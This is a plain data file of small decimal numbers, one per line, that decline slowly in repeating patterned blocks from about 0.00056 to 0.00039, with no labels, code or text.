0.000552421
0.00055694
0.000552425
0.000539361
0.000543647
0.000543647
0.00054365
0.000539363
0.000539364
0.000534828
0.000530655
0.000534855
0.000530596
0.000530621
0.000534794
0.000534852
0.000534828
0.000530655
0.000534857
0.000530596
0.000530622
0.000534794
0.000534851
0.000539405
0.000543633
0.000543573
0.000539375
0.000543608
0.000539437
0.000539378
0.000539404
0.000543633
0.000543571
0.000539377
0.000543606
0.000539437
0.000539378
0.000534869
0.000530581
0.000530582
0.000530578
0.000534865
0.000534865
0.000534856
0.00053937
0.00053486
0.000539374
0.000521811
0.000517293
0.00052181
0.000517294
0.000517305
0.000513019
0.000513019
0.000517302
0.000517302
0.000513016
0.000521842
0.000526009
0.000526073
0.000521814
0.000526046
0.000521817
0.000521872
0.000521841
0.000526013
0.000526072
0.000521812
0.000526047
0.000521815
0.000521874
0.000521798
0.000526086
0.000526086
0.00052609
0.000521802
0.000521802
0.000517262
0.000513032
0.000517291
0.000513091
0.000517289
0.000513056
0.00051723
0.000517263
0.000513033
0.000517291
0.000513091
0.000517288
0.000513058
0.00051723
0.000499722
0.00050424
0.000499727
0.000504242
0.000504231
0.00050852
0.00050852
0.000508524
0.000504234
0.000504234
0.000499694
0.000495519
0.00049972
0.000495459
0.000499717
0.000499662
0.000495486
0.000499696
0.000495518
0.000499725
0.000495463
0.00049972
0.000499663
0.000495486
0.000504275
0.000508506
0.000508442
0.000504244
0.000508481
0.000504247
0.000504307
0.000504277
0.000508506
0.000508443
0.000504247
0.000508481
0.000504248
0.000504309
0.000499736
0.000495446
0.000495448
0.000499732
0.000499733
0.000495444
0.000517298
0.000517283
0.000513026
0.000513036
0.000517298
0.000517286
0.000513022
0.000521803
0.00052608
0.000521813
0.000526081
0.000521805
0.000521802
0.000521823
0.000526082
0.000526063
0.000521808
0.00052608
0.000521819
0.000517298
0.000513022
0.000517288
0.0005173
0.000513021
0.000504238
0.000508515
0.0005085
0.000504256
0.000508517
0.00050424
0.000504253
0.000499731
0.000499719
0.000495452
0.000495453
0.000499729
0.000504239
0.000508516
0.000504246
0.000508517
0.000504239
0.000499731
0.000499713
0.000495455
0.000495466
0.000495453
0.000499729
0.000499715
0.000504236
0.000508514
0.000508498
0.000504256
0.000508514
0.000504238
0.000504251
0.000499729
0.000499717
0.000495451
0.000499729
0.000495453
0.000504236
0.000508515
0.000504244
0.000508514
0.000504237
0.000499729
0.00049971
0.000495453
0.000495467
0.000499726
0.000499716
0.000495452
0.000517298
0.000513012
0.000513011
0.000517297
0.000517294
0.000513008
0.000521836
0.000526006
0.00052607
0.000521811
0.000521812
0.000526041
0.000521871
0.000521834
0.000526005
0.000526066
0.000521807
0.000521868
0.00052604
0.000521808
0.000521792
0.000526084
0.000526081
0.000521797
0.000526085
0.000521795
0.000517258
0.000513027
0.00051729
0.000513088
0.000517284
0.000517227
0.000513053
0.000517256
0.000513025
0.000517284
0.000513085
0.000517224
0.00051728
0.000513051
0.000521803
0.000517288
0.000499722
0.000504238
0.000504226
0.000508513
0.000508513
0.000508516
0.000504229
0.000504229
0.00049969
0.000495516
0.000499721
0.000495459
0.000499657
0.000499716
0.000495483
0.000499689
0.000495514
0.000499717
0.000495457
0.000499714
0.000499656
0.000495481
0.00050427
0.000508499
0.000508438
0.000504242
0.000504303
0.000508474
0.000504243
0.000504269
0.0005085
0.000508436
0.00050424
0.000508473
0.000504243
0.0005043
0.000499733
0.000495444
0.000495443
0.00049973
0.000499728
0.00049544
0.00049972
0.000504236
0.000517298
0.000517281
0.000513019
0.000513037
0.000517294
0.000517285
0.000513022
0.000521805
0.000526082
0.000521816
0.000526082
0.000521805
0.000521804
0.000521824
0.000526081
0.000526065
0.000521806
0.000526081
0.000521821
0.000517299
0.000513022
0.000517287
0.000517298
0.000513022
0.000504237
0.000508495
0.00050851
0.000504255
0.000508513
0.00050425
0.000504238
0.000499732
0.000499721
0.000495453
0.000495454
0.000499732
0.000504238
0.000508515
0.000504248
0.000508515
0.000504239
0.000499731
0.000499713
0.000495466
0.000495453
0.000495453
0.000499715
0.000499728
0.000504237
0.000508511
0.000508498
0.000504254
0.000508514
0.000504238
0.000504251
0.000499731
0.000499718
0.000495453
0.000499729
0.000495453
0.000504237
0.000508514
0.000504246
0.000508514
0.000504236
0.00049973
0.000499713
0.000495454
0.000495466
0.000499728
0.000499715
0.000495453
0.000517297
0.00051728
0.000513035
0.000513023
0.000517283
0.000517296
0.000513021
0.000521802
0.000526077
0.000521811
0.000521801
0.000526079
0.000521802
0.000521822
0.000526061
0.00052608
0.000521816
0.000526079
0.000521806
0.000517297
0.000513019
0.000517285
0.000517296
0.00051302
0.000517298
0.000517279
0.000513022
0.000513033
0.000517296
0.000517282
0.000513021
0.000521802
0.00052608
0.000521812
0.00052608
0.000521803
0.000521803
0.000521823
0.000526081
0.000526067
0.000526082
0.000521807
0.000521818
0.000517296
0.000513018
0.000517285
0.000517295
0.00051302
0.000504235
0.000508497
0.000508512
0.00050425
0.000508513
0.000504249
0.000504236
0.000499726
0.000499715
0.000495445
0.000499724
0.000495448
0.000504234
0.000508512
0.000504241
0.000508513
0.000504233
0.000499728
0.00049971
0.000495463
0.000495452
0.000499714
0.000499726
0.00049545
0.000504234
0.000508511
0.000508495
0.000504249
0.000508513
0.000504235
0.000504246
0.000499727
0.000499715
0.000495447
0.000499727
0.000495448
0.000504234
0.000508512
0.000504241
0.000508513
0.000504234
0.000499728
0.000499707
0.000495451
0.000495464
0.000499725
0.000499713
0.00049545
0.000517306
0.000513019
0.000513018
0.000517304
0.000517304
0.000513015
0.000521845
0.000526012
0.000526075
0.000521815
0.000521817
0.00052605
0.000521876
0.000521844
0.000526013
0.000526075
0.000521815
0.000521871
0.000526048
0.00052182
0.000521801
0.000526089
0.00052609
0.000521804
0.000526093
0.000521805
0.000517263
0.000513033
0.000517292
0.000513089
0.000517289
0.000517231
0.000513056
0.000517262
0.000513031
0.000517292
0.000513088
0.000517226
0.000517289
0.000513055
0.000521811
0.000517292
0.000499723
0.000504241
0.000504231
0.000508519
0.000508519
0.000508522
0.000504235
0.000504234
0.000499694
0.000495518
0.000499721
0.000495462
0.00049966
0.000499719
0.000495485
0.000499696
0.000495521
0.000499724
0.000495461
0.000499718
0.000499662
0.000495486
0.000504276
0.000508506
0.000508438
0.000504246
0.000504305
0.00050848
0.000504249
0.000504276
0.000508504
0.000508439
0.000504246
0.000508479
0.000504248
0.000504305
0.000499736
0.000495447
0.000495447
0.000499733
0.000499733
0.000495444
0.000499726
0.000504242
0.000517297
0.000517278
0.000513033
0.000513023
0.000517281
0.000517296
0.000513021
0.000521804
0.000526082
0.000521813
0.000521803
0.000526082
0.000521803
0.000521822
0.000526065
0.000526081
0.000521816
0.000526081
0.000521807
0.000517297
0.000513018
0.000517285
0.000517294
0.000513022
0.000517297
0.000517276
0.00051303
0.000513022
0.000517278
0.000517296
0.00051302
0.000521804
0.000526081
0.000521813
0.000526083
0.000521804
0.000521804
0.000521821
0.000526064
0.000526081
0.000526083
0.000521818
0.000521807
0.000517296
0.000513016
0.000517285
0.000517293
0.000513018
0.000504237
0.000508496
0.000508513
0.000504256
0.000508514
0.000504251
0.00050424
0.000499733
0.000499721
0.000495456
0.000499732
0.000495457
0.000504237
0.000508512
0.000504246
0.000508514
0.000504236
0.000499732
0.000499715
0.000495471
0.000495455
0.000499718
0.00049973
0.000495456
0.000504237
0.000508493
0.000508513
0.000504255
0.000508512
0.00050425
0.00050424
0.000499729
0.000499718
0.000495451
0.000499728
0.000495452
0.000504235
0.000508509
0.000504243
0.000508512
0.000504235
0.000499729
0.000499713
0.000495464
0.000495453
0.000499712
0.000499729
0.000495451
0.000521806
0.00051729
0.000521809
0.000517291
0.000504227
0.000508514
0.000508514
0.000508518
0.000504229
0.00050423
0.00049969
0.000495516
0.000499717
0.000495459
0.000495485
0.000499656
0.000499714
0.00049969
0.000495519
0.000499719
0.00049546
0.000495486
0.000499658
0.000499716
0.00050427
0.0005085
0.000508435
0.00050424
0.000508473
0.000504299
0.000504243
0.000504269
0.0005085
0.000508435
0.00050424
0.000508473
0.0005043
0.000504244
0.000499733
0.000495444
0.000495445
0.000495442
0.000499729
0.00049973
0.00049972
0.000504236
0.000499722
0.000504237
0.00048667
0.000482153
0.000486669
0.000482152
0.000482163
0.000477876
0.000477876
0.00048216
0.00048216
0.000477873
0.0004867
0.00049087
0.000490931
0.000486673
0.000490906
0.000486674
0.000486732
0.0004867
0.000490869
0.000490934
0.000486673
0.000490906
0.000486675
0.000486732
0.000486657
0.000490946
0.000490948
0.00049095
0.00048666
0.000486661
0.000482121
0.00047789
0.000482151
0.000477947
0.000482147
0.000477915
0.000482087
0.000482121
0.00047789
0.000482151
0.000477948
0.000482146
0.000477915
0.000482089
0.000464582
0.000469099
0.000464581
0.000469099
0.000469088
0.000473377
0.000473377
0.00047338
0.000469091
0.000469091
0.000464552
0.000460374
0.000464582
0.000460319
0.000464577
0.000464515
0.000460344
0.000464549
0.000460374
0.000464577
0.000460317
0.000464575
0.000464516
0.000460342
0.00046913
0.000473362
0.000473297
0.000469103
0.000473335
0.000469106
0.00046916
0.000469128
0.000473363
0.000473297
0.000469101
0.000473336
0.000469104
0.000469161
0.000464594
0.000460304
0.000460304
0.00046459
0.00046459
0.000460301
0.00048216
0.000482143
0.000477884
0.000477896
0.000482159
0.000482145
0.000477882
0.000486668
0.000490945
0.000486675
0.000490946
0.000486668
0.000486666
0.000486685
0.000490943
0.000490927
0.00048667
0.000490944
0.000486681
0.00048216
0.000477881
0.000482148
0.00048216
0.000477882
0.000469096
0.000473372
0.000473355
0.000469112
0.000473373
0.000469096
0.000469109
0.000464588
0.000464577
0.000460308
0.000460308
0.000464587
0.000469095
0.000473371
0.000469104
0.000473373
0.000469096
0.000464588
0.00046457
0.00046031
0.000460323
0.000460309
0.000464584
0.000464573
0.000469094
0.000473372
0.000473357
0.000469112
0.000473373
0.000469097
0.000469109
0.000464588
0.000464577
0.000460309
0.000464587
0.000460311
0.000469095
0.000473372
0.000469104
0.000473373
0.000469094
0.000464588
0.00046457
0.000460312
0.000460325
0.000464585
0.000464573
0.000460311
0.000482161
0.000477874
0.000477872
0.000482159
0.000482157
0.00047787
0.000486698
0.000490867
0.00049093
0.000486672
0.000486674
0.000490904
0.00048673
0.000486699
0.000490865
0.000490929
0.00048667
0.000486728
0.000490902
0.000486673
0.000486656
0.000490944
0.000490943
0.000486659
0.000490947
0.000486658
0.000482117
0.000477888
0.000482148
0.000477947
0.000482145
0.000482087
0.000477912
0.000482118
0.000477886
0.000482146
0.000477945
0.000482084
0.000482143
0.000477911
0.000486665
0.000482148
0.000464581
0.000469098
0.000469087
0.000473375
0.000473374
0.000473378
0.00046909
0.000469089
0.000464551
0.000460377
0.00046458
0.000460319
0.000464517
0.000464576
0.000460345
0.000464551
0.000460379
0.000464579
0.000460319
0.000464575
0.000464517
0.000460345
0.00046913
0.000473361
0.000473297
0.000469102
0.000469163
0.000473334
0.000469104
0.000469129
0.000473359
0.000473294
0.000469099
0.000473332
0.000469103
0.000469161
0.000464593
0.000460305
0.000460305
0.00046459
0.000464589
0.000460302
0.00046458
0.000469095
0.000482159
0.000482144
0.000477886
0.000477896
0.00048216
0.000482143
0.000477883
0.000486666
0.000490944
0.000486676
0.000490945
0.000486666
0.000486666
0.000486686
0.000490944
0.000490924
0.00048667
0.000490943
0.000486679
0.00048216
0.000477884
0.000482149
0.000482159
0.000477884
0.000469098
0.000473357
0.000473374
0.000469113
0.000473375
0.000469112
0.000469099
0.000464589
0.000464576
0.000460309
0.00046031
0.000464588
0.000469095
0.000473371
0.000469103
0.000473372
0.000469095
0.00046459
0.000464572
0.000460323
0.000460312
0.000460311
0.000464575
0.000464588
0.000469098
0.000473374
0.000473358
0.000469111
0.000473376
0.000469099
0.00046911
0.00046459
0.000464575
0.000460311
0.000464587
0.000460313
0.000469098
0.000473377
0.000469105
0.000473377
0.000469098
0.000464591
0.000464571
0.000460313
0.000460326
0.000464588
0.000464574
0.000460314
0.000482155
0.000482137
0.00047789
0.000477876
0.000482139
0.000482153
0.000477877
0.000486662
0.000490937
0.000486669
0.00048666
0.00049094
0.000486662
0.00048668
0.000490923
0.000490941
0.000486675
0.000490941
0.000486665
0.000482155
0.000477877
0.000482143
0.000482154
0.000477877
0.000482156
0.00048214
0.000477877
0.000477891
0.000482154
0.000482142
0.000477878
0.000486663
0.000490938
0.000486672
0.00049094
0.000486662
0.000486663
0.000486683
0.000490941
0.000490923
0.000490941
0.000486666
0.000486678
0.000482157
0.000477878
0.000482146
0.000482156
0.000477879
0.000469091
0.00047335
0.000473365
0.000469104
0.000473368
0.000469104
0.000469091
0.000464587
0.000464576
0.00046031
0.000464586
0.000460311
0.00046909
0.000473367
0.000469099
0.000473368
0.00046909
0.000464586
0.000464565
0.000460324
0.000460311
0.000464572
0.000464582
0.000460311
0.000469091
0.000473366
0.000473353
0.000469106
0.00047337
0.000469092
0.000469103
0.000464587
0.000464576
0.000460309
0.000464588
0.000460311
0.000469094
0.000473372
0.000469104
0.000473372
0.000469095
0.000464585
0.000464566
0.000460311
0.000460321
0.000464583
0.000464568
0.00046031
0.000482165
0.000477879
0.000477878
0.000482162
0.000482162
0.000477874
0.000486701
0.00049087
0.000490932
0.000486674
0.000486675
0.000490904
0.000486734
0.000486701
0.000490871
0.000490932
0.000486674
0.000486733
0.000490905
0.000486676
0.000486658
0.000490947
0.000490947
0.000486661
0.000490949
0.000486662
0.000482122
0.000477893
0.000482152
0.000477949
0.000482149
0.000482087
0.000477917
0.000482121
0.000477891
0.000482151
0.00047795
0.000482088
0.000482148
0.000477914
0.000486672
0.000482155
0.00046458
0.000469099
0.000469089
0.000473379
0.000473378
0.000473381
0.000469093
0.000469093
0.000464551
0.000460378
0.000464578
0.000460317
0.000464519
0.000464575
0.000460343
0.000464551
0.00046038
0.000464581
0.000460318
0.000464576
0.000464521
0.000460343
0.000469132
0.000473364
0.000473299
0.000469105
0.000469165
0.000473337
0.000469107
0.000469132
0.000473364
0.0004733
0.000469105
0.000473336
0.000469106
0.000469165
0.000464593
0.000460303
0.000460304
0.00046459
0.00046459
0.0004603
0.000464582
0.0004691
0.000482162
0.000482141
0.000477895
0.000477883
0.000482146
0.000482158
0.000477883
0.000486671
0.000490949
0.000486678
0.00048667
0.000490949
0.000486669
0.000486688
0.000490932
0.000490944
0.000486685
0.000490948
0.00048667
0.000482164
0.000477886
0.000482151
0.000482164
0.000477886
0.000482157
0.000482142
0.000477896
0.000477881
0.000482145
0.000482157
0.00047788
0.000486666
0.000490943
0.000486676
0.000490944
0.000486667
0.000486665
0.000486689
0.000490926
0.000490944
0.000490943
0.000486684
0.00048667
0.000482159
0.00047788
0.000482149
0.000482158
0.000477881
0.000469098
0.000473356
0.000473373
0.000469113
0.000473375
0.000469112
0.000469099
0.000464592
0.000464579
0.000460313
0.000464591
0.000460314
0.000469098
0.000473377
0.000469106
0.000473377
0.000469097
0.000464592
0.000464574
0.000460329
0.000460315
0.000464577
0.000464589
0.000460315
0.000469096
0.000473356
0.000473371
0.000469115
0.000473372
0.00046911
0.000469099
0.00046459
0.00046458
0.000460314
0.000464589
0.000460315
0.000469094
0.00047337
0.000469104
0.000473372
0.000469094
0.00046459
0.000464575
0.000460328
0.000460317
0.000464573
0.00046459
0.000460314
0.000486667
0.000482151
0.000486672
0.000482154
0.000469089
0.000473376
0.000473377
0.000473379
0.000469092
0.000469093
0.000464555
0.000460378
0.00046458
0.000460322
0.000460349
0.000464519
0.000464579
0.000464556
0.00046038
0.000464583
0.000460324
0.000460349
0.000464522
0.000464581
0.000469133
0.000473361
0.000473297
0.000469102
0.000473335
0.000469162
0.000469106
0.000469134
0.000473363
0.0004733
0.000469103
0.000473336
0.000469166
0.000469106
0.000464598
0.000460309
0.00046031
0.000460306
0.000464593
0.000464594
0.000464582
0.000469098
0.000464586
0.0004691
0.000451528
0.000447012
0.000451525
0.000447009
0.000447018
0.000442732
0.000442732
0.000447016
0.000447016
0.000442728
0.000451556
0.000455726
0.000455789
0.000451529
0.000455763
0.000451531
0.000451589
0.000451556
0.000455726
0.000455788
0.000451529
0.000455763
0.000451531
0.000451589
0.000451513
0.000455803
0.000455803
0.000455805
0.000451517
0.000451516
0.000446977
0.000442746
0.000447009
0.000442808
0.000447003
0.000442771
0.000446946
0.000446976
0.000442746
0.000447007
0.000442806
0.000447002
0.000442772
0.000446944
0.000429441
0.000433959
0.000429442
0.000433959
0.000433948
0.000438235
0.000438235
0.000438238
0.000433951
0.000433951
0.000429411
0.000425238
0.000429439
0.00042518
0.000429436
0.00042938
0.000425205
0.000429412
0.00042524
0.000429441
0.00042518
0.000429437
0.000429379
0.000425205
0.000433991
0.000438221
0.000438159
0.000433962
0.000438195
0.000433965
0.000434024
0.000433992
0.000438221
0.000438157
0.000433964
0.000438196
0.000433966
0.000434023
0.000429455
0.000425166
0.000425166
0.000429451
0.000429451
0.000425164
0.000447018
0.000446998
0.000442743
0.000442752
0.000447016
0.000447003
0.000442741
0.000451524
0.000455801
0.000451533
0.000455802
0.000451523
0.000451523
0.000451541
0.000455801
0.000455786
0.000451526
0.000455802
0.000451539
0.000447019
0.00044274
0.000447006
0.000447017
0.000442742
0.000433954
0.000438231
0.000438217
0.000433973
0.000438231
0.000433957
0.000433969
0.000429449
0.000429437
0.000425169
0.00042517
0.000429447
0.000433955
0.000438233
0.000433965
0.000438233
0.000433956
0.000429448
0.000429428
0.000425172
0.000425182
0.00042517
0.000429446
0.00042943
0.000433953
0.000438231
0.000438212
0.00043397
0.000438231
0.000433956
0.000433966
0.000429449
0.000429435
0.000425168
0.000429448
0.000425171
0.000433954
0.000438231
0.000433963
0.000438232
0.000433954
0.000429447
0.000429427
0.00042517
0.000425185
0.000429444
0.000429432
0.000425171
0.000447024
0.000442736
0.000442736
0.000447021
0.000447021
0.000442733
0.000451563
0.000455729
0.000455791
0.000451532
0.000451535
0.000455767
0.000451594
0.000451563
0.000455732
0.000455792
0.000451533
0.000451596
0.000455768
0.000451535
0.000451518
0.000455806
0.000455806
0.000451521
0.000455809
0.000451521
0.000446983
0.000442749
0.00044701
0.000442809
0.000447007
0.000446951
0.000442774
0.000446983
0.000442751
0.00044701
0.000442807
0.00044695
0.000447008
0.000442774
0.000451529
0.000447012
0.000429439
0.000433957
0.000433945
0.000438235
0.000438235
0.000438238
0.000433949
0.000433949
0.00042941
0.000425236
0.000429439
0.000425178
0.000429377
0.000429435
0.000425203
0.00042941
0.000425236
0.00042944
0.000425179
0.000429436
0.000429375
0.000425202
0.00043399
0.000438221
0.000438157
0.000433962
0.000434023
0.000438194
0.000433963
0.00043399
0.000438221
0.000438156
0.000433962
0.000438194
0.000433963
0.000434021
0.000429452
0.000425163
0.000425164
0.000429449
0.000429449
0.00042516
0.000429443
0.000433958
0.000447019
0.000446999
0.000442742
0.000442754
0.000447016
0.000447004
0.000442742
0.000451526
0.000455802
0.000451534
0.000455804
0.000451525
0.000451526
0.000451541
0.000455802
0.000455786
0.000451527
0.000455804
0.00045154
0.000447019
0.00044274
0.000447008
0.000447017
0.000442741
0.00043395
0.000438214
0.000438228
0.000433971
0.000438228
0.000433967
0.000433954
0.000429446
0.000429437
0.000425169
0.000425169
0.000429448
0.000433951
0.000438231
0.000433965
0.00043823
0.000433954
0.000429444
0.000429428
0.000425183
0.00042517
0.000425167
0.000429431
0.000429443
0.000433957
0.00043823
0.000438215
0.000433973
0.000438233
0.000433957
0.000433971
0.000429447
0.000429436
0.000425169
0.000429445
0.000425169
0.000433955
0.000438233
0.000433964
0.000438234
0.000433955
0.000429448
0.000429431
0.000425169
0.000425184
0.000429445
0.000429434
0.000425169
0.00044702
0.000447003
0.000442754
0.000442743
0.000447004
0.000447018
0.000442741
0.000451524
0.000455801
0.000451533
0.000451523
0.000455803
0.000451525
0.000451544
0.000455785
0.000455802
0.000451539
0.000455803
0.000451528
0.000447019
0.000442738
0.000447007
0.000447017
0.00044274
0.000447021
0.000447003
0.000442743
0.000442756
0.000447018
0.000447006
0.000442743
0.000451527
0.000455803
0.000451535
0.000455804
0.000451526
0.000451527
0.000451545
0.000455802
0.000455786
0.000455804
0.000451528
0.000451542
0.00044702
0.000442739
0.000447008
0.000447018
0.000442741
0.000433954
0.000438215
0.000438231
0.00043397
0.000438232
0.000433966
0.000433956
0.000429448
0.000429438
0.000425171
0.000429447
0.000425172
0.000433953
0.000438229
0.000433962
0.000438231
0.000433952
0.000429448
0.000429428
0.000425187
0.000425174
0.000429432
0.000429446
0.000425173
0.000433956
0.000438231
0.000438216
0.000433971
0.000438234
0.000433957
0.000433969
0.00042945
0.000429438
0.000425171
0.000429449
0.000425174
0.000433956
0.000438232
0.000433964
0.000438233
0.000433955
0.00042945
0.000429431
0.000425175
0.000425185
0.000429447
0.000429433
0.000425173
0.000447025
0.000442737
0.000442738
0.00044702
0.000447022
0.000442735
0.000451562
0.000455729
0.000455789
0.000451531
0.000451534
0.000455764
0.000451594
0.000451564
0.000455732
0.000455791
0.000451535
0.000451597
0.000455765
0.000451537
0.000451518
0.000455804
0.000455805
0.00045152
0.000455808
0.000451522
0.000446982
0.000442751
0.000447009
0.000442809
0.000447006
0.00044695
0.000442777
0.000446986
0.000442753
0.000447014
0.000442813
0.000446955
0.000447009
0.000442778
0.000451532
0.000447015
0.000429441
0.000433959
0.000433948
0.000438237
0.000438238
0.000438242
0.000433951
0.000433951
0.000429411
0.000425238
0.000429438
0.000425179
0.000429378
0.000429436
0.000425205
0.000429411
0.000425237
0.00042944
0.000425182
0.000429437
0.000429378
0.000425205
0.000433992
0.000438223
0.000438157
0.000433964
0.000434023
0.000438197
0.000433966
0.000433992
0.000438224
0.00043816
0.000433962
0.000438198
0.000433965
0.000434024
0.000429455
0.000425166
0.000425167
0.000429451
0.000429451
0.000425164
0.000429442
0.000433958
0.00044702
0.000447003
0.000442752
0.000442743
0.000447004
0.000447018
0.00044274
0.000451527
0.000455804
0.000451537
0.000451526
0.000455806
0.000451528
0.000451549
0.000455791
0.000455805
0.000451544
0.000455806
0.00045153
0.000447018
0.000442736
0.000447009
0.000447017
0.000442739
0.000447023
0.000447002
0.000442756
0.000442743
0.000447007
0.000447019
0.000442743
0.000451531
0.000455808
0.000451537
0.000455809
0.000451531
0.000451531
0.00045155
0.00045579
0.000455806
0.000455807
0.000451547
0.000451532
0.000447023
0.000442742
0.000447008
0.00044702
0.000442744
0.000433955
0.000438213
0.000438231
0.000433969
0.000438232
0.000433968
0.000433957
0.000429449
0.000429437
0.000425171
0.000429448
0.000425172
0.000433954
0.000438229
0.000433961
0.000438231
0.000433953
0.00042945
0.000429427
0.000425185
0.000425172
0.000429433
0.000429446
0.000425172
0.000433958
0.000438215
0.000438232
0.000433972
0.000438235
0.000433972
0.000433958
0.00042945
0.000429439
0.000425171
0.000429449
0.000425172
0.000433957
0.000438233
0.000433965
0.000438236
0.000433957
0.00042945
0.000429431
0.000425186
0.000425173
0.000429434
0.000429447
0.000425172
0.000451531
0.000447013
0.000451532
0.000447013
0.000433948
0.000438237
0.000438238
0.000438241
0.000433951
0.000433951
0.000429414
0.00042524
0.000429441
0.000425179
0.000425206
0.00042938
0.000429436
0.000429413
0.000425241
0.00042944
0.000425179
0.000425206
0.00042938
0.000429437
0.000433992
0.000438223
0.000438156
0.000433963
0.000438194
0.000434023
0.000433965
0.000433992
0.000438223
0.000438156
0.000433963
0.000438194
0.000434023
0.000433965
0.000429454
0.000425165
0.000425165
0.000425162
0.000429451
0.000429451
0.000429442
0.000433958
0.000429443
0.00043396
0.000416388
0.00041187
0.000416388
0.00041187
0.000411882
0.000407594
0.000407594
0.000411879
0.000411879
0.000407591
0.000416419
0.000420589
0.000420652
0.000416391
0.000420626
0.000416394
0.00041645
0.00041642
0.000420592
0.000420653
0.000416392
0.000420628
0.000416395
0.000416453
0.000416377
0.000420667
0.000420667
0.000420671
0.000416381
0.000416381
0.000411838
0.000407607
0.000411867
0.000407667
0.000411865
0.000407631
0.000411806
0.000411838
0.000407608
0.000411869
0.000407667
0.000411865
0.000407633
0.000411808
0.0003943
0.000398816
0.000394302
0.000398818
0.000398808
0.000403095
0.000403095
0.000403098
0.000398811
0.000398811
0.000394273
0.000390097
0.000394299
0.000390037
0.000394295
0.000394237
0.000390063
0.000394273
0.000390094
0.000394301
0.000390039
0.000394296
0.000394236
0.000390064
0.000398852
0.00040308
0.000403016
0.000398821
0.000403054
0.000398825
0.000398881
0.000398853
0.000403081
0.000403017
0.000398822
0.000403055
0.000398825
0.000398881
0.000394313
0.000390024
0.000390024
0.00039431
0.00039431
0.000390021
0.000411878
0.000411859
0.0004076
0.000407613
0.000411875
0.000411862
0.0004076
0.000416383
0.000420658
0.000416391
0.000420661
0.000416383
0.000416384
0.000416402
0.00042066
0.000420644
0.000416386
0.000420662
0.000416397
0.000411877
0.000407598
0.000411865
0.000411876
0.0004076
0.000398811
0.000403086
0.000403072
0.00039883
0.000403087
0.000398814
0.000398825
0.000394304
0.000394294
0.000390025
0.000390026
0.000394302
0.000398811
0.000403088
0.000398821
0.000403089
0.000398811
0.000394304
0.00039429
0.000390029
0.00039004
0.000390027
0.000394303
0.000394289
0.000398813
0.000403088
0.000403075
0.00039883
0.000403092
0.000398815
0.000398827
0.000394305
0.000394293
0.000390024
0.000394304
0.000390026
0.000398814
0.000403092
0.000398822
0.000403093
0.000398814
0.000394305
0.000394288
0.000390026
0.000390038
0.000394303
0.000394287
0.000390026
0.000411881
0.000407593
0.000407593
0.000411878
0.000411878
0.000407589
0.000416417
0.000420587
0.000420649
0.000416389
0.000416393
0.000420623
0.00041645
0.000416419
0.000420587
0.000420651
0.000416393
0.000416449
0.000420623
0.000416394
0.000416376
0.000420663
0.000420664
0.000416378
0.000420666
0.000416379
0.000411837
0.000407607
0.000411867
0.000407667
0.000411864
0.000411805
0.000407631
0.000411839
0.000407607
0.00041187
0.000407665
0.000411803
0.000411864
0.000407631
0.000416389
0.000411872
0.0003943
0.000398818
0.000398808
0.000403095
0.000403094
0.000403098
0.000398811
0.00039881
0.000394272
0.000390095
0.000394299
0.000390038
0.000394235
0.000394296
0.000390064
0.000394271
0.000390097
0.000394297
0.000390038
0.000394294
0.000394237
0.000390063
0.000398851
0.00040308
0.000403017
0.000398822
0.000398881
0.000403053
0.000398825
0.00039885
0.00040308
0.000403015
0.00039882
0.000403052
0.000398823
0.000398881
0.000394313
0.000390024
0.000390024
0.00039431
0.000394309
0.000390021
0.0003943
0.000398816
0.000411874
0.00041186
0.000407599
0.000407613
0.000411874
0.000411862
0.000407596
0.000416382
0.000420661
0.000416393
0.000420661
0.000416385
0.000416381
0.0004164
0.000420659
0.000420643
0.000416384
0.00042066
0.000416397
0.000411875
0.000407597
0.000411865
0.000411875
0.000407597
0.000398815
0.00040308
0.000403091
0.000398835
0.000403094
0.00039883
0.000398816
0.000394307
0.000394296
0.000390028
0.000390029
0.000394306
0.000398815
0.000403096
0.000398824
0.000403095
0.000398816
0.000394308
0.000394289
0.000390043
0.00039003
0.00039003
0.000394293
0.000394304
0.000398812
0.00040309
0.000403073
0.000398835
0.000403088
0.000398816
0.000398829
0.000394308
0.000394297
0.00039003
0.000394308
0.00039003
0.000398812
0.000403089
0.000398824
0.000403089
0.000398815
0.000394307
0.000394291
0.000390031
0.000390045
0.000394306
0.000394293
0.000390031
0.000411877
0.000411859
0.000407609
0.000407601
0.00041186
0.000411876
0.000407599
0.000416386
0.000420663
0.000416394
0.000416385
0.000420664
0.000416386
0.000416405
0.000420648
0.000420664
0.0004164
0.000420665
0.000416388
0.000411878
0.0004076
0.000411867
0.000411877
0.000407601
0.000411879
0.000411858
0.000407601
0.000407615
0.000411876
0.000411863
0.0004076
0.000416387
0.000420664
0.000416394
0.000420666
0.000416386
0.000416387
0.000416402
0.000420665
0.000420646
0.000420666
0.000416388
0.000416399
0.000411879
0.000407599
0.000411866
0.000411877
0.000407601
0.000398815
0.000403072
0.000403091
0.000398831
0.000403092
0.000398827
0.000398815
0.000394309
0.000394296
0.000390028
0.000394308
0.000390029
0.000398816
0.000403092
0.000398823
0.000403094
0.000398816
0.000394307
0.00039429
0.000390044
0.000390029
0.000394293
0.000394304
0.000390028
0.000398813
0.000403091
0.000403075
0.000398829
0.000403092
0.000398815
0.000398825
0.000394307
0.000394297
0.000390027
0.000394307
0.000390028
0.000398814
0.000403092
0.000398822
0.000403093
0.000398814
0.000394306
0.000394286
0.00039003
0.000390041
0.000394304
0.00039429
0.000390028
0.000411882
0.000407594
0.000407593
0.000411879
0.000411879
0.00040759
0.000416421
0.000420588
0.000420652
0.000416393
0.000416395
0.000420627
0.000416451
0.00041642
0.000420591
0.000420653
0.000416391
0.00041645
0.000420627
0.000416396
0.000416378
0.000420666
0.000420667
0.000416381
0.000420671
0.000416381
0.000411837
0.000407608
0.000411868
0.000407667
0.000411865
0.000411805
0.000407632
0.000411836
0.000407607
0.000411868
0.000407663
0.000411801
0.000411865
0.000407631
0.000416388
0.00041187
0.000394302
0.000398819
0.000398808
0.000403095
0.000403094
0.000403097
0.000398811
0.00039881
0.000394275
0.0003901
0.000394301
0.000390039
0.000394242
0.000394297
0.000390063
0.000394271
0.000390096
0.000394297
0.000390038
0.000394295
0.000394237
0.000390062
0.000398854
0.000403081
0.000403017
0.000398824
0.000398886
0.000403054
0.000398826
0.000398851
0.000403078
0.000403016
0.000398819
0.000403053
0.000398823
0.000398882
0.000394314
0.000390025
0.000390024
0.000394311
0.00039431
0.000390021
0.000394301
0.000398817
0.000411876
0.000411859
0.000407611
0.000407599
0.000411861
0.000411874
0.000407598
0.000416386
0.000420664
0.000416393
0.000416386
0.000420665
0.000416385
0.000416404
0.000420647
0.000420661
0.000416401
0.000420663
0.000416386
0.000411876
0.000407596
